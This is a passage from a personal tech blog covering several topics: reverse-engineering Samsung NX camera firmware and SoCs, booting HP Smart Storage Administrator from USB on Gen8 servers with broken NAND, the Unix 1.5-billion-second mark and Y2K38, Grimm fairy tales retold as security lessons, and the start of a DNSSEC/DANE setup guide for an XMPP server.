10275754      0x9CCBAA        Copyright string: "Copyright (c) 2000-2009 by FotoNation. All rights reserved."
10485554      0x9FFF32        Copyright string: "Copyright Wind River Systems, Inc., 1984-2007"
10495200      0xA024E0        VxWorks WIND kernel version "2.11"

So we have identified the OS as Wind River's VxWorks.

A strings inspection of the bin also gives us "ARM DRIMeIII - ARM926E (ARM)" and "DRIMeIII H.264/AVC Encoder", confirming the SoC generation, weird network stuff ("ftp password (pw) (blank = use rsh)"), and even some fancy ASCII art:

]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
     ]]]]]]]]]]]  ]]]]     ]]]]]]]]]]       ]]              ]]]]         (R)
]     ]]]]]]]]]  ]]]]]]     ]]]]]]]]       ]]               ]]]]            
]]     ]]]]]]]  ]]]]]]]]     ]]]]]] ]     ]]                ]]]]            
]]]     ]]]]] ]    ]]]  ]     ]]]] ]]]   ]]]]]]]]]  ]]]] ]] ]]]]  ]]   ]]]]]
]]]]     ]]]  ]]    ]  ]]]     ]] ]]]]] ]]]]]]   ]] ]]]]]]] ]]]] ]]   ]]]]  
]]]]]     ]  ]]]]     ]]]]]      ]]]]]]]] ]]]]   ]] ]]]]    ]]]]]]]    ]]]] 
]]]]]]      ]]]]]     ]]]]]]    ]  ]]]]]  ]]]]   ]] ]]]]    ]]]]]]]]    ]]]]
]]]]]]]    ]]]]]  ]    ]]]]]]  ]    ]]]   ]]]]   ]] ]]]]    ]]]] ]]]]    ]]]]
]]]]]]]]  ]]]]]  ]]]    ]]]]]]]      ]     ]]]]]]]  ]]]]    ]]]]  ]]]] ]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]       Development System
]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]       
]]]]]]]]]]]]]]]]]]]]]]]]]]       KERNEL: 
]]]]]]]]]]]]]]]]]]]]]]]]]       Copyright Wind River Systems, Inc., 1984-2007

The 2012 models (NX20, NX210, NX1000, NX1100) contain the same copyright and CPU identification strings after a cursory look, confirming the same info about the third DRIMe generation.

Side note: there is also a compact camera from early 2010, the WB2000/TL350 (EU/US name), also built around the DRIMeIII and also running VxWorks. It looks like it was developed in parallel to the DRIMeII-based NX10!

Another camera based on DRIMeIII and VxWorks is the EX2F from 2012.

DRIMeIV, Tizen Linux: NX300(M), NX310, NX2000, NX30

Samsung NX300 (*)

In early 2013, Samsung gave a CES press conference announcing the DRIMe IV based NX300. Linux was not mentioned, but we got a novelty single-lens 3D feature and an AMOLED screen. Samsung also published a design overview of the NX300 evolution.

I've looked into the NX300 root filesystem back in 2014, and the CPU generation was also confirmed from /proc/cpuinfo:

Hardware    : Samsung-DRIMeIV-NX300

The NX310 is just an NX300 with additional bundled gimmicks, sharing the same firmware. The actual successor to the NX300 is the NX2000, featuring a large AMOLED and almost no physical buttons (why would anybody buy a camera without knobs and dials?). It's followed by the NX300M (a variant of the NX300 with a 180° tilting screen), and the NX30 (released 2014, a larger variant with eVF and built-in flash).

All of them have similarly sized and named firmware (nx300.bin), and the respective OSS downloads feature a TIZEN folder. All are running Linux kernel 3.5.0. There is a nice description of the firmware file structure by Douglas J. Hickok. The bin files begin with SLP\x00, probably for "Samsung Linux Platform", and thus I documented them as SLP Firmware Format and created an SLP firmware dumper.
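
As a quick sanity check, a firmware file can be sniffed for that magic before any further parsing; a minimal Python sketch (nothing beyond the four-byte magic is assumed here):

import sys

# check for the "SLP\x00" magic of the Samsung Linux Platform
# firmware format at the very beginning of the file
with open(sys.argv[1], "rb") as f:
    magic = f.read(4)
print("SLP firmware" if magic == b"SLP\x00" else "unknown format")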

Fujitsu M7MU: NX mini, NX3000, NX3300

Samsung NX mini (*)

In the first half of 2014, the NX mini was announced. It also features WiFi and NFC, and with its NX-M mount it is one of the smallest digital interchangeable-lens cameras out there! The editor notes reveal that it's based on the "M7MU" DSP, which unfortunately is impossible to google for.

The firmware archive contains a file called DATANXmini.bin (which is not the SLP format and also a break with the old-school 8.3 filename convention), and it seems to use some sort of data compression, as most strings are garbled after 16 bytes or earlier (C:\colomia\Gui^@^@Lib\Sources\Core^@^PAllocator.H, here using Vim's binary escape notation).

There are a few string matches for "M7MU", but nothing that would reveal details about its manufacturer or operating system. The (garbled) copyright strings give a mixed picture, with mentions of:

Copyright (c) 2<80>^@^@5-2011, Jouni Ma^@^@linen <*@**.**>
^@^@and contributors^@^B^@This program ^@^Kf^@^@ree software. Yo!
u ^@q dis^C4e it^AF/^@<9c>m^D^@odify^@^Q
under theA^@ P+ms of^B^MGNU Gene^A^@ral Pub^@<bc> License^D^E versPy 2.

Samsung NX3000 (*)

This doesn't give us any hints on what is powering this nice curiosity of an ILC. The few PCB photos available on the internet have the CPU covered with a sticker, so no dice there either. All of the above similarly applies to the NX3000, which is running very similar code but has the larger NX mount, and to the NX3300, which is a slightly modified NX3000 with more selfie shooting and less Adobe Lightroom.

It took me quite a while of fruitless guessing, until I was able to obtain a (broken) NX3000 and disassemble it, just to remove the CPU sticker.

The sticker revealed that the CPU is actually an "MB86S22A", another Fujitsu Milbeaut Image Processor, with M-7M being the seventh generation (not sure about "MU", but there is "MO" for mobile devices), built around the ARM Cortex-A5MP core!

GitHub code search reveals that there is actually an M7MU driver in the forked Exynos Linux kernel, and it defines the firmware header structure. Let's hack together a header reader in Python real quick, and run it over the NX mini firmware.
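
A stripped-down sketch of such a reader might look like this (the "<5I" layout below is an illustrative assumption; the authoritative field order and widths come from the kernel's header definition):

import struct
import sys

with open(sys.argv[1], "rb") as f:
    hdr = f.read(512)

# assumed: five little-endian u32 fields at the start of the header
(block_size, writer_load_size, write_code_entry,
 sdram_param_size, nand_param_size) = struct.unpack_from("<5I", hdr, 0)
for name, value in (
    ("block_size", block_size),
    ("writer_load_size", writer_load_size),
    ("write_code_entry", write_code_entry),
    ("sdram_param_size", sdram_param_size),
    ("nand_param_size", nand_param_size),
):
    print(f"{name:18} {value:#x} ({value})")

Extended to all of the fields and run over DATANXmini.bin, it yields: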

Header Value
block_size 0x400 (1024)
writer_load_size 0x4fc00 (326656)
write_code_entry 0x40000400 (1073742848)
sdram_param_size 0x90 (144)
nand_param_size 0xe1 (225)
sdram_data *stripped 144 bytes*
nand_data *stripped 225 bytes*
code_size 0xafee12 (11529746)
offset_code 0x50000 (327680)
version1 "01.10"
log "201501162119"
version2 "GLUAOA2"
model "NXMINI"
section_info 00000007 00000001
0050e66c 00000002
001a5985 00000003
00000010 00000004
00061d14 00000005
003e89d6 00000006
00000010 00000007
00000010 00000000
9x 00000000
pdr ""
ddr 00 b3 3f db 26 02 08 00 d7 31 08 29 01 80 00 7c 8c 07
epcr 00 00 3c db 00 00 08 30 26 00 f8 38 00 00 00 3c 0c 07

That was less than informative. At least it's a good hint for loading the firmware into a decompiler, if anybody gets interested enough.

But why should the Linux kernel have a module to talk to an M7MU? One of the kernel trees containing that code is called kernel_samsung_exynos5260 and the Exynos 5260 is the SoC powering the Galaxy K Zoom. So the K Zoom does have a regular Exynos SoC running Android, and a second Milbeaut SoC running the image processing. Let's postpone this Android hybrid for now.

DRIMeV, Tizen Linux: NX1, NX500, Gear360

Samsung NX1 (*)

In late 2014, Samsung released the high-end DRIMeV-based NX1, featuring a backside-illuminated 28 MP sensor and 4K H.265 video in addition to all the features of previous NX models. There was also an interview with a very excited Samsung Senior Marketing Manager that contains PCB shots and technical details. Once again, Linux is only mentioned in third-party coverage, e.g. in the EOSHD review.

Samsung NX500 (*)

In February 2015, the NX1 was followed by the more compact NX500 based around a slightly reduced DRIMeVs SoC. Apparently, the DRIMeVs also powers the Gear 360 camera, and indeed, there is a teardown with PCB shots confirming that and showing an additional MachXO3 FPGA, but also some firmware reverse-engineering as well as firmware mirroring efforts. The Gear360 is running Tizen 2.2.0 "Magnolia" and requires a companion app for most of its functions.

The NX1 is using the same modified version of the SLP firmware format as the Gear360. In versions before 1.21, the ext4 partitions were uncompressed, leading to significantly larger bin file sizes. They still contain Linux 3.5.0, but ext4 is a significant change over the UBIFS on the DRIMeIV cameras, and allows in-place modification from a telnet shell.

Android phones with dedicated photo co-processor

Samsung has also experimented with hybrid devices that are neither smartphone nor camera. The first such device seems to be the Galaxy Camera from 2012.

Samsung Galaxy K4 Zoom (*)

The Android firmware ZIP files (obtained from a Samsung "fan club" website) contain one or multiple tar.md5 files (which are tar archives with appended MD5 checksums to be flashed by Odin).

Galaxy Camera (EK-GC100, EK-GC120)

For the Galaxy Camera EK-GC100, there is a CODE_GC100XXBLL7_751817_REV00_user_low_ship.tar.md5 in the ZIP, that contains multiple .img files:

-rw-r--r-- se.infra/se.infra     887040 2012-12-26 12:12 sboot.bin
-rw-r--r-- se.infra/se.infra     768000 2012-12-26 11:41 param.bin
-rw-r--r-- se.infra/se.infra     159744 2012-12-26 12:12 tz.img
-rw-r--r-- se.infra/se.infra    4980992 2012-12-26 12:12 boot.img
-rw-r--r-- se.infra/se.infra    5691648 2012-12-26 12:12 recovery.img
-rw------- se.infra/se.infra 1125697212 2012-12-26 12:11 system.img

None of these look like camera firmware, but system.img is the Android rootfs (a sparse image convertible with simg2img to obtain an ext4 image). In the rootfs, /vendor/firmware/ contains a few files, including a 1.2MB fimc_is_fw.bin.

The Galaxy Camera Linux source has an Exynos FIMC-IS (Image Subsystem) driver working over I2C, and the firmware itself contains a few interesting strings:

src\FIMCISV15_HWPF\SIRC_SDK\SIRC_Src\ISP_GISP_HQ_ThSc.c
* S5PC220-A5 - Solution F/W                    *
* since 2010.05.21 for ISP Team                  *
SIRC-ISP-SDK-R1.02.00
https://svn/svn/SVNRoot/System/Software/tcevb/SDK+FW/branches/Pegasus-2012_01_12-Release
"isp_hardware_version" : "Fimc31"

Furthermore, the firmware bin file seems to start with a typical ARM v7 reset vector table, but other than that it looks like the image processor is a built-in component of the Exynos4 SoC.

Galaxy S4 Zoom: SM-C1010, SM-C101, SM-C105

Samsung Galaxy S4 Zoom (*)

The next Android hybrid released by Samsung was the Galaxy S4 Zoom (SM-C1010, SM-C101, SM-C105) in 2013. In its CODE_[...].tar.md5 firmware, there is an additional 2MB camera.bin file that contains the camera processor firmware. Binwalk only reveals a few FotoNation copyright strings, but strings gives some more interesting hints, like:

SOFTUNE REALOS/ARM is REALtime OS for ARM.COPYRIGHT(C) FUJITSU MICROELECTRONICS LIMITED 1999
M9MOFujitsuFMSL
AHFD Face Detection Library M9Mo v.1.0.2.6.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
LibFE M9Mo v.0.2.0.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
FCGK02 Fujitsu M9MO

Softune is an IDE used by Fujitsu and Infineon for embedded processors, featuring the REALOS µITRON real-time OS!

M9MO sounds like a 9th-generation Milbeaut image processor, but again there is not much to see without the model number, and it's hard to find good PCB shots without stickers. There is an S4 Zoom disassembly guide featuring quite a few PCB shots, but the top side only shows the Exynos SoC, eMMC flash and an Intel baseband. There are uncovered bottom pics submitted to the FCC, which are too low-res to identify whether there is a dedicated SoC.

As shown above, Samsung has a history of working with Milbeaut and µITRON, so it's probably not a stretch to conclude that this combination powers the S4 Zoom's camera, but it's hard to say if it's a logical core inside the Exynos 4212 or a dedicated chip.

Galaxy NX: EK-GN100, EK-GN120

Samsung Galaxy NX (*)

Just one week after the S4 Zoom, still in June 2013, Samsung announced the Galaxy NX (EK-GN100, EK-GN120) with interchangeable lenses, 20.3MP APS-C sensor, and DRIMeIV SoC - specs already known from January's NX300.

But the Galaxy NX is also an Android 4.2 smartphone (even if it lacks a microphone and speakers, so technically it's just a micro-tablet?). How can it be a DRIMeIV Linux device and an Android phone at the same time? The firmware surely will enlighten us!

Similarly to the S4 Zoom, the firmware is a ZIP file containing a [...]_HOME.tar.md5. One of the files inside it is camera.bin, and this time it's 77MB! This file now features the SLP\x00 header known from the NX300:

camera.bin: GALAXYU firmware 0.01 (D20D0LAHB01) with 5 partitions
           144    5523488   f68a86 ffffffff  vImage
       5523632       7356 ad4b0983 7fffffff  D4_IPL.bin
       5530988      63768 3d31ae89 65ffffff  D4_PNLBL.bin
       5594756    2051280 b8966d27 543fffff  uImage
       7646036   71565312 4c5a14bc 4321ffff  platform.img

The platform.img file contains a UBIFS root partition, and presumably vImage is used for upgrading the DRIMeIV firmware, and uImage is the standard kernel running on the camera SoC. The rootfs is very similar to the NX300 as well, featuring the same "squeeze/sid" string in /etc/debian_version, even though it's again Tizen / Samsung Linux Platform. There is a 500KB /usr/bin/di-galaxyu-app that's probably responsible for camera operation as well as for talking to the Android CPU. Further reverse engineering is required to understand what kind of IPC mechanism is used between the cores.

The Galaxy NX got the CES 2014 award for the first fully-connected interchangeable lens camera, but probably not for fully-connecting a SoC running Android-flavored Linux with a SoC running Tizen-flavored Linux on the same board.

Galaxy Camera 2

Shortly after the Galaxy NX, the Galaxy Camera 2 (EK-GC200) was announced and presented at CES 2014.

Very similar to the first Galaxy Camera, it has a 1.2MB /vendor/firmware/fimc_is_fw.bin file, and also shares most of the strings with it. Apart from a few changed internal SVN URLs, this seems to be roughly the same module.

Galaxy K Zoom: SM-C115, SM-C111, SM-C115L

As already identified above, the Galaxy K Zoom (SM-C115, SM-C111, SM-C115L), released in June 2014, is using the M7MU image processor. The respective firmware can be found inside the Android rootfs at /vendor/firmware/RS_M7MU.bin and is 6.2MB in size. It also features the same compression mechanism as the NX mini firmware, making it harder to analyze, but the M7MU firmware header looks more consistent:

Header Value
code_size 0x5dee12 (6155794)
offset_code 0x40000 (262144)
version1 "00.01"
log "201405289234"
version2 "D20FSHE"
model "06DAGCM2"

Rumors of unreleased models

During (and after) Samsung's involvement in the camera market, there were many rumors of shiny new models that didn't materialize. Here is an attempt to classify the press coverage without any insider knowledge:

  • Samsung NX-R (concept design, R for retro?), September 2012 - most probably an early name of the NX2000 (the front is very similar, no pictures of the back).

  • Samsung NX400 / NX400-EVF, July 2014 - looks like the NX400 was renamed to NX500, and an EVF version never materialized.

  • Samsung NX2 prototype, February 2018 - might be a joke/troll or an engineer having some fun. Three years after closing the camera department, it's hard to imagine that somebody produced a 30MP APS-C sensor out of thin air, added a PCB with a modern SoC to read it out, and created (preliminary) firmware.

  • Samsung NX Ultra, April 1st 2020, 'nuff said.

Conclusion

In just five years, Samsung released eighteen cameras and one smartphone/camera hybrid under the NX label, plus a few more phones with zoom lenses, built around the Fujitsu Milbeaut SoC as well as multiple generations of Samsung's custom-engineered (or maybe initially licensed from Fujitsu?) DRIM engine.

The number of different platforms and overlapping release cycles is a strong indication that the devices were developed by two or three product teams in parallel, or maybe even independently of each other. This engineering effort could have proven a huge success with amateur and professional photographers, if it hadn't been stopped by Samsung management.

To this day, the Tizen-based NX models remain the best trade-off between picture quality and hackability (in the most positive meaning).

Comments on HN


(*) All pictures (C) Samsung marketing material

Posted 2023-03-31 17:27 Tags:

This post describes how to start "Intelligent Provisioning" or the "HP Smart Storage Administrator (ACU / SSA)" on a Gen8 server with a broken NAND, so that you can change the boot disk order. It has been successfully tested on the HPE MicroServer Gen8 as well as on a ProLiant ML310e Gen8, using either a USB drive or a µSD / SD card with at least 1GB of capacity.

Update 2021-05-17: to consistently boot from an SSD in port 5, switch to Legacy SATA mode. See below for details.

iLO self-test error and SSA not working

Changing the Boot Disk

HP Gen8 servers in AHCI mode will always try to boot from the first disk in the (non-)hot-swap drive bay, and completely ignore the other disks you have attached.

The absolutely non-obvious way to change the boot device, as outlined in a well-hidden comment on the HP forum, is:

  • Change the SATA mode from "AHCI" to "RAID" in BIOS
    • Ignore the nasty red and orange warning about losing all your data
  • Boot into HP "Smart" Storage Administrator
  • Create a single logical disk of type RAID0
  • Add the desired boot device (and only it!) to the RAID0
  • Profit!

The disks in the drive bay will become invisible as boot devices / to your GRUB, but they will keep working as before under your operating system, and there seems to be no negative impact on the boot device either.

This is great advice, provided that you are actually able to boot into SSA (by pressing F5 at the right moment during your bootup process).

WARNING / Update 2020-10-07: apparently, booting from an SSD on the ODD port (SATA port 5) is not supported by HPE, so it is a pure coincidence that it is possible to set up, and your server will eventually forget the RAID configuration of the ODD port, falling back to whatever boot device is in the first non-hot-plug bay. This has happened to me on the ML310e, but not on the MicroServer (as reported in the forum) yet.

Update 2021-05-17: after another reboot-induced RAID config loss, I have done some more research and found this suggestion to switch to Legacy SATA mode. Another source in German. I have followed it:

  1. Reboot into BIOS Setup (press F9), switch to Legacy SATA
    • System Options
      • SATA Controller Options
        • Embedded SATA Configuration
          • SATA Legacy Support
  2. Reboot into BIOS Setup (press F9), switch boot controller Order
    • Boot Controller Order
      • Ctlr:2
  3. Optional 😉: shut down the box and swap the cables on ports 5 and 6.
  4. Profit!

My initial fear that the "Legacy" mode would cause a performance downgrade has so far not materialized. The devices are still operated in the fastest SATA mode supported on the respective port, and NCQ seems to work as well.

The Error Message

However, for some time now, my HP MicroServer Gen8 has been showing one of those nasty NAND / Flash / SD-Card / whatever error messages:

  • iLO Self-Test reports a problem with: Embedded Flash/SD-CARD. View details on Diagnostics page.
  • Controller firmware revision 2.10.00 Partition Table Read Error: Could not partition embedded media device
  • Embedded Flash/SD-CARD: Embedded media initialization failed due to media write-verify test failure.
  • Embedded Flash/SD-CARD: Failed restart..

...or a variation thereof. I have ignored it because I thought it referred to the SD card, and it didn't impact the server in noticeable ways.

At least not until I wanted to make the shiny new SSD that I bought the default boot device for the server, which is when I realized that neither the F5 key to run HP's "Smart" Storage Administrator tool nor the F10 key for the "Intelligent" Provisioning tool (do you notice a theme in their naming?) had any effect on the boot process.

The "Official" Solution

The general advice from the Internet to "fix" this error is to repeat the following steps in random order, multiple times:

  • Disconnect mains power for some minutes
  • "Format Embedded Flash and reset iLO" from the iLO web interface
  • "Reset iLO" from the iLO web interface
  • Reset the CMOS settings from the F9 menu
  • Reset the iLO settings via mainboard jumpers
  • Downgrade iLO to 2.54
  • Upgrade iLO to the latest version
  • Send a custom XML via HPQLOCFG.exe

And once the error is fixed, to boot the Intelligent Provisioning recovery media to put the right data back onto the NAND.

I've tried the various suggestions (except for the iLO downgrade, because the HTML5 console introduced in 2.70 is the only one not requiring arcane legacy browsers), but the error remained.

So I tried to install the provisioning recovery media nevertheless, but it failed with the anticipated "Error flashing the NVRAM":

Intelligent Provisioning screenshot: Error flashing the NVRAM

(it will not boot the ISO if you just dd it to a USB flash drive, but you can put it on a DVD or use the "Virtual Media" gimmick on a licensed iLO)

If none of the above "fixes" work, then your NAND chip is probably faulty indeed and thus the final advice given is:

  • Contact HPE for a replacement motherboard

However, my MicroServer is out of warranty, and I'm not keen on waiting weeks or months for a replacement and shelling out real money on top.

Booting directly into SSA / IP

But that fancy HPIP171.2019_0220.23.iso we downloaded to repair the NAND surely contains what we need, in some heavily obfuscated form?

Let's mount it as a loopback device and find out!

# mount HPIP171.2019_0220.23.iso -o loop /media/cdrom/
# cd /media/cdrom/
# ls -al
total 65
drwxrwxrwx 1 root root  2048 Feb 21  2019 ./
drwxr-xr-x 5 root root  4096 Sep 11 18:41 ../
-rw-rw-rw- 1 root root 34541 Feb 21  2019 back.jpg
drwxrwxrwx 1 root root  2048 Feb 21  2019 boot/
-r--r--r-- 1 root root  2048 Feb 21  2019 boot.catalog
drwxrwxrwx 1 root root  2048 Feb 21  2019 efi/
-rw-rw-rw- 1 root root  2913 Feb 21  2019 font_15.fnt
-rw-rw-rw- 1 root root  3843 Feb 21  2019 font_18.fnt
drwxrwxrwx 1 root root  2048 Feb 21  2019 ip/
drwxrwxrwx 1 root root  2048 Feb 21  2019 pxe/
drwxrwxrwx 1 root root  6144 Feb 21  2019 system/
drwxrwxrwx 1 root root  2048 Feb 21  2019 usb/
# du -sm */
2   boot/
5   efi/
916 ip/
67  pxe/
30  system/
4   usb/
# ls -al ip/
total 937236
drwxrwxrwx 1 root root      2048 Feb 21  2019 ./
drwxrwxrwx 1 root root      2048 Feb 21  2019 ../
-rw-r-xr-x 1 root root 125913644 Feb 21  2019 bigvid.img.gz*
-rw-r-xr-x 1 root root 706750514 Feb 21  2019 gaius.img.gz*
-rw-r-xr-x 1 root root       114 Feb 21  2019 manifest.json*
-rw-rw-rw- 1 root root       140 Feb 21  2019 md5s.txt
-rw-rw-rw- 1 root root       164 Feb 21  2019 sha1sums.txt
-rw-r-xr-x 1 root root 127058868 Feb 21  2019 vid.img.gz*
# zcat ip/gaius.img.gz | file -
/dev/stdin: DOS/MBR boot sector

The ip directory contains the largest payload of that ISO, and all three .img.gz files look like disk images, with exactly 256MB (vid), 512MB (bigvid) and 1024MB (gaius) extracted sizes.

Following the "bigger is better" slogan, let's write the biggest one, gaius.img.gz to an USB flash drive and see what happens!

# # replace /dev/sdc below with your flash drive device!
# zcat gaius.img.gz |dd of=/dev/sdc bs=1M status=progress
... wait a while ...
# reboot

Then, on boot-up, select the "USB DriveKey" option:

HP MicroServer Gen8 Boot Menu

And you will be greeted by a friendly black & white GRUB loader, offering you "Intelligent" Provisioning and "Smart" Storage Administrator, which you can promptly and successfully boot:

HP IP / SSA Boot Loader

HP IP / SSA Welcome Screen

From here, you can create a single logical volume of type RAID0, add just your boot disk into it, restart and be happy!

Posted 2020-09-14 12:15

The Bill-and-a-half-ennium

Tonight (2017-07-14), at or around 02:40:00 GMT, the Unix time will have a value of 1 500 000 000 seconds, counting from January 1st, 1970. The last event of this kind, when Unix time reached 1 000 000 000 seconds, was on September 9th, 2001, when the world still was a nice and good place. Because that was a billion seconds, some people incorrectly called it the "Billennium". Yours truly actually stayed up late enough (01:46 GMT) to celebrate the event with a hacker friend.

If you want to celebrate this special decimal representation of an arcane time measure, there is a nice countdown page!

The next one of this kind, 2 000 000 000, will be in 2033, so you better party hard this time!

The Year 2038 Problem (Y2K38)

This is also a good reminder of the many systems that are still using Unix time internally, and the legacy and embedded ones that store it in a 32-bit signed integer. Because this kind of integer overflows at 2 147 483 647, which will happen in 2038, all kinds of problems are expected.
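
The critical timestamps are easy to verify; a few lines of Python:

from datetime import datetime, timezone

# the largest value a signed 32-bit time_t can hold
print(datetime.fromtimestamp(2**31 - 1, tz=timezone.utc))
# -> 2038-01-19 03:14:07+00:00

# the celebrated round numbers
for t in (1_000_000_000, 1_500_000_000, 2_000_000_000):
    print(t, datetime.fromtimestamp(t, tz=timezone.utc))
# 1000000000 -> 2001-09-09 01:46:40+00:00
# 1500000000 -> 2017-07-14 02:40:00+00:00
# 2000000000 -> 2033-05-18 03:33:20+00:00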

There is already a great writeup on the current state of affairs regarding Y2K38 support, so instead of an in-depth technical analysis I'm going to provide a personal anecdote.

My first encounter with Y2K38 was in 2002 - a phone call from a relative who had trouble logging into an SSH server using PuTTY. It took some time to figure out the root cause - a dead CMOS battery in the PC led to incorrect clock values, bringing the machine far into the future, some time into the 2040s.

Being a good citizen, I reported the bug to the developers (with a detailed explanation of the setup and a stack trace), and got a rather laconic answer:

Date: 11 Feb 2002 22:54:52
Subject: putty crashing on time() overflow

Georg Lukas writes:

putty is crashin with an access violation when you try to connect to a host and it is after time() goes over 2^31 (i.e. after Tue, 19 Jan 2038 04:14:07 +0100).

Thanks for the timely bug report. With a bit of luck we'll fix this one before it becomes a problem for too many users.

(S)

I haven't quite followed up, but recent versions of PuTTY, on a recent 64-bit Windows, don't exhibit this problem any more, so it looks like we are safe!

Future

While we still have a bit more than 20 years to fix Y2K38, I'm sure that there will be plenty of legacy 32-bit systems running when the date approaches. As with Y2K, there will be denial, anger, bargaining, depression and acceptance. And maybe a big boom that brings down the whole IT landscape, however it might look in 20 years.

One way or the other, I will be a professional Y2K38 consultant with 36 years of working experience! Please contact me soon so I can ensure a timely retirement to some far-away island before day X! ;-)

Posted 2017-07-13 19:11

It is that time of the year again, and so we are proud to present a special revelation for Christmas!

The Brothers Grimm were not only academics, linguists, cultural researchers, lexicographers and authors, but also the world's first IT Security analysts. They wrote their so-called fairy tales to document different kinds of security vulnerabilities, attacks and even some countermeasures. This article analyzes select examples and emphasizes the relevant lessons. Basic knowledge of the referenced stories is required to follow the analysis.

Rumpelstiltskin - A Badly Implemented Crypto Locker

Rumpelstiltskin, a typical script kiddie, lures the miller's daughter into installing a crypto locker Trojan. Once she becomes the queen, the crypto locker makes her firstborn child inaccessible, providing a three-day unlock period.

Fortunately for the royal family, the implementation is flawed in two ways. Not only does it lack protection against brute force attacks, it also has a very weak password hard-coded into it.

The queen organizes a massively parallel brute-force attack, employing all of the kingdom's available system resources. Finally, she manages to guess the right password and is able to regain access to her firstborn.

Lessons:

  • Never install software from untrusted sources.
  • Do not use your username as your password.
  • Properly protect your system against brute-force attacks.

The Wolf and the Seven Young Goats - Outsourced Biometric Access Control Systems

The Big Bad Wolf is an obvious black-hat actor who wants to gain access to the goats' house. The mother goat, who needs to leave the home, has put into place a biometric access control system based on two factors: optical paw recognition and voice identification.

However, instead of deploying an implementation with known failure rate characteristics, she creates an insufficient requirements specification ("you will know him at once by his rough voice and his black feet.") and outsources the implementation to her kids, who do not have prior experience or formal education in the domain.

Besides creating an implementation that uses too few biometric features to allow for robust identification and authentication, the presented solution also exposes the exact cause of the authentication failure to the attacker ("[Our mother] has a soft, pleasant voice, but your voice is rough, you are the wolf." and "our mother has not black feet like you, you are the wolf."). This exposure of internal error causes allows the attacker to improve his approach and to succeed at the third attempt.

Lessons:

  • Take the time to properly specify security system requirements.
  • Do not outsource the development of mission-critical systems.
  • Only use biometrics as a supplementary mechanism to another access control system.
  • Do not expose internal error messages to potential attackers.
  • Properly protect your system against brute-force attacks.

Snow White - Social Media and Identity Theft

After hunting the young Snow White out of the family home, the queen stepmother is watching social media for signs of beautiful people (using a monitoring application called the "wonderful looking-glass"). She deploys a self-written face recognition algorithm that scans pictures tagged as #beautiful and returns a beauty index value (unfortunately, this detail is lost in the English translation. The German original reads "Aber Schneewittchen ist tausendmal schöner als Ihr." - "Snow White is a thousand times as beautiful as you are.").

Meanwhile Snow White, who is living in a safe house operated by the Seven Dwarfs charity organization, ignores the instructions to leave behind her social media presence, and posts geo-tagged selfies without properly scrubbing the metadata.

The queen's monitoring application notifies her of the newly analyzed pictures. Alerted by this, she obtains Snow White's geo-location from the pictures and performs a series of social engineering attacks. She uses stolen identity information from different sales representatives to successfully gain access to the safe house and to eventually poison Snow White.

Lessons:

  • Stop using your social media when going undercover, no matter how hard it is.
  • Social engineering is very effective, and in most cases it is not sufficient to teach employees about it. Additional safeguards like double checking are needed.

Sleeping Beauty - Exploiting an Off-by-One Remote Vulnerability

The kingdom in question has thirteen IT security experts (who, due to the lack of better wording in 1857, were called "the wise women"). One of them was not invited to the release party, so instead she performs an unsolicited penetration test. During her testing, she creates a specially-crafted message ("The king's daughter shall in her fifteenth year prick herself with a spindle, and fall down dead.") that exploits an off-by-one vulnerability in the dining service implementation.

Initially, the message was designed to crash the newly-forked child thread, but due to sand-boxing and ASLR techniques deployed by the twelfth wise woman, the whole application gets suspended into the interactive debugging console instead. This event triggers an automatic firewall rule temporarily blocking all external access to the application.

Due to the lack of a monitoring system, the production service is down for a noticeable time ("asleep for a hundred years"), but eventually, a rock-star developer is found and hired (the "king's son"). He is able to circumvent the firewall and to access the server console. From there, he reconstructs the stack and is able to continue application execution, and they live contented to the end of their days.

Lessons:

  • Bug bounties are a good way to focus curiosity and to learn about vulnerabilities.
  • Production services should be properly monitored to detect downtime.

Have a nice holiday season and a merry new year!

Comments on HN

Posted 2016-12-22 18:25

.IM top-level domain Domain Name System Security Extensions Look-aside Validation DNS-based Authentication of Named Entities Extensible Messaging and Presence Protocol TLSA ("TLSA" does not stand for anything; it is just the name of the RRtype) resource record.

Okay, seriously: this post is about securing an XMPP server running on an .IM domain with DNSSEC, using yax.im as a real-life example. In the world of HTTP there is HPKP, and browsers come with a long list of pre-pinned site certificates for the who's who of the modern web. For XMPP, DNSSEC is the only viable way to extend the broken Root CA trust model with a slightly-less-broken hierarchical trust model from DNS (there is also TACK, which is impossible to deploy because it modifies the TLS protocol, and is also unmaintained).

Because the .IM TLD is not DNSSEC-signed yet, we will need to use DLV (DNSSEC Look-aside Validation), an additional DNSSEC trust root operated by the ISC (until the end of 2016). Furthermore, we will need to set up the correct entries for yax.im (the XMPP service domain), chat.yax.im (the conference domain) and xmpp.yaxim.org (the actual server running the service).

This post has been sitting in the drafts folder for a while, but now that DANE-SRV has been promoted to Proposed Standard, it was a good time to finalize the article.

Introduction

Our (real-life) scenario is as follows: the yax.im XMPP service is run on a server named xmpp.yaxim.org (for historical reasons, the yax.im host is a web server forwarding to yaxim.org, not the actual XMPP server). The service furthermore hosts the chat.yax.im conference service, which needs to be accessible from other XMPP servers as well.

In the following, we will create SRV DNS records to advertise the server name, obtain a TLS certificate, configure DNSSEC on both domains and create (signed) DANE records that define which certificate a client can expect when connecting.

Once this is deployed, state-level attackers will not be able to MitM users of the service simply by issuing rogue certificates; they would also have to compromise the DNSSEC chain of trust (in our case one of the following: ICANN/VeriSign, DLV, PIR or the registrar/NS hosting our domains, essentially limiting the number of states able to pull this off to one).

Creating SRV Records for XMPP

The service / server separation is made possible with the SRV record in DNS, which is a more generic variant of records like MX (e-mail server) or NS (domain name server) and defines which server is responsible for a given service on a given domain.

For XMPP, we create the following three SRV records to allow clients (_xmpp-client._tcp), servers (_xmpp-server._tcp) and conference participants (_xmpp-server._tcp on chat.yax.im) to connect to the right server:

_xmpp-client._tcp.yax.im       IN SRV 5 1 5222 xmpp.yaxim.org.
_xmpp-server._tcp.yax.im       IN SRV 5 1 5269 xmpp.yaxim.org.
_xmpp-server._tcp.chat.yax.im  IN SRV 5 1 5269 xmpp.yaxim.org.

